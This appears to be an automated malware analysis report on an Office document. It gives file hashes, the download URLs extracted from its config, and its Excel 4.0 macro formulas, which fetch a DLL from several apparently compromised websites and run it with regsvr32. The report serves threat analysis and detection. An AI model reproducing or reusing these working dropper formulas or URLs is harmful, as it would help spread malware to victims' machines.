General
-
Target
c5e91b67025af43532ffbc06cf7009684f0c632e61d1b41a022c6de9243b8c9a
-
Size
20KB
-
MD5
3cf35d21c013505c2af4e059eff8b552
-
SHA1
c1b2af94d52f68da802dbba83f0820da05110fd6
-
SHA256
c5e91b67025af43532ffbc06cf7009684f0c632e61d1b41a022c6de9243b8c9a
-
SHA512
dc82ea8c6411a5fecf1fad1ff1d6e563f87e7ca875bea10cd55335a077ffa6f1dfe1e2afc9b9352e45d327bb2255e6fb268b3dc0b84aff414ca7b8b5e1a0b3c3
-
SSDEEP
384:eJaVb1GNjImo4CGzPd6ZIwwSKb5CzgObff9kC+xbX7Fg7a:kiIN3o4FLTCBn9kC+xbLF1
Malware Config
Extracted
https://banrai.ac.th/website/IHI0iNLLWDh9P/
http://bangsoe.dk/__backup/JON6L/
http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/
https://barkstage.es/wp-content/S0Q/
https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/
http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/
https://www.manchesterot.co.uk/about-us/LFXAJJIa/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://banrai.ac.th/website/IHI0iNLLWDh9P/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bangsoe.dk/__backup/JON6L/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://barkstage.es/wp-content/S0Q/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/LFXAJJIa/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
c5e91b67025af43532ffbc06cf7009684f0c632e61d1b41a022c6de9243b8c9a